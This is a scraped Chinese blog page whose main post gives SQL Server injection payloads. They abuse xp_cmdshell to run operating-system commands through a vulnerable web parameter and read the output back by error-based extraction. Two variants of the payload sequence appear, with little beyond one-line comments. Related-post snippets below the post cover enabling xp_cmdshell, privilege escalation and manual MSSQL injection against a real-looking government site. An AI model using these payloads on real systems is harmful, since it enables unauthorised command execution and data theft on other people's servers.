sql server 注入漏洞执行cmd指令并得到回显

最新推荐文章于 2022-12-20 22:41:04 发布
最新推荐文章于 2022-12-20 22:41:04 发布
阅读量4.2k 收藏 1
点赞数
分类专栏: 安全 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/50205309
版权
';create table temp(id int identity(1,1),a varchar(8000));--        创建一个表


';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; --        执行cmd指令并且插入到表中

' and (select top 1 a from temp where id>5)>0 --                        查询这个表里面的信息,得到cmd指令运行结果

' or (select count(*) from temp)>0 -- 25                                          得到这个表里面的数据行数

';drop table temp; --                                                                          删除表


优雅的方式:

';create table temp(id int identity(1,1),a varchar(8000));--        创建一个表


';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; --        执行cmd指令并且插入到表中

' and (select substring((select a from temp for xml auto),1,4000 ) ) >0--  可以一次得到所有的结果

';drop table temp; --                                                                          删除表

niexinming
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于错误回显SQL注入整理
12-14
 用我自己的话来讲,基于错误回显sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
Python3 执行系统命令并获取实时回显功能
09-19
主要介绍了Python3 执行系统命令并获取实时回显功能,文中通过两种方法给大家介绍了Python执行系统命令并获得输出的方法,需要的朋友可以参考下
cmd_火山PC_cmd_CMD回显_
10-01
火山PC ,递归软件64位cmd回显注册表方式回显,开发软件为火山PCX64 20210120免费版
渗透测试—提权方式总结
qq_29864185的博客
07-06 1621
目录 一、 什么是提权 二、怎样进行提权(提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7633
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
sql server中使用xp_cmdshell
weixin_30755393的博客
01-23 666
关键词:sql server开启高级配置,使用Bat,cmdshell1、sql server中使用xp_cmdshell --允许配置高级选项 EXEC sp_configure 'show advanced options',1 GO RECONFIGURE GO 2、 --开启xp_cmdshell服务 EXEC sp_configure 'xp_...
在有注入漏洞SQL服务器上运行CMD命令
eldn__的专栏
04-20 1137
利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:    EXEC master.dbo.xp_cmdshell 'dir c:\'    但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 4768
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL注入之MySQL注入
weixin_51583033的博客
12-20 777
SQL注入之MySQL注入
SQL Server 注入
mingyqf的博客
03-22 2333
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
MySQL命令\注入
weixin_46928280的博客
07-25 1386
使用MySQL从建库、建表,对数据的增删改查,删库、删表跑路等基本命令进行注入!!!
C_c++代码执行cmd命令.txt
11-01
文档提供了六种在C++代码中运行cmd命令的方法。并以具体的例子加以说明。
delphi执行dos程序并回显
01-02
执行dos命令,并在memo显示出来。不是直接调用cmd窗口显示。
使用ysoserial生成反序列化文件
热门推荐
一个码农的笔记
06-01 2万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
jar重新打包
一个码农的笔记
05-05 2万+
首先
破解md5的python代码,持续更新
一个码农的笔记
09-22 1万+
# -*- coding: utf-8 -*- import string import hashlib file=open("hello.txt","a") md5input=raw_input("请输入md5:\n") md5input=md5input.lower() apt=string.printable[:-6] def dfs(s,num): m=hashlib.md5()
简单的方式挖掘和利用soap的sql注入
一个码农的笔记
10-29 1万+
1.首先soap是什么: 对于应用程序开发来说,使程序之间进行因特网通信是很重要的。目前的应用程序通过使用远程过程调用(RPC)在诸如 DCOM 与 CORBA 等对象之间进行通信,但是 HTTP 不是为此设计的。RPC 会产生兼容性以及安全问题;防火墙和代理服务器通常会阻止此类流量。通过 HTTP 在应用程序间通信是更好的方法,因为 HTTP 得到了所有的因特网浏览器及服务器的支持。SOAP 
mssql手工注入
一个码农的笔记
10-11 1万+
报错注入: 例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0 报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1
Linux 加固(centos7)
一个码农的笔记
08-20 1万+
(1)寻找空密码的用户: 首先root账户建立一个用户: useradd user (这样建立的用户的是不能直接用空密码登陆的) 然后root账户用passwd -d user 清除user的密码(这样就可以用空密码登陆了) 查找空密码的用户 awk -F: '($2==””){print $1}' /etc/shadow 这样我们找到这样的空密码的用户:user 给空密码账户上密码:
subprocess,cmd命令行不回显怎么办
最新发布
07-17
如果在使用 subprocess 模块执行 cmd 命令行时遇到了不回显的问题,你可以尝试使用以下方法来解决: 1. 将 subprocess 的标准输出重定向到一个管道,然后读取管道的内容。可以使用 `subprocess.PIPE` 来实现: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值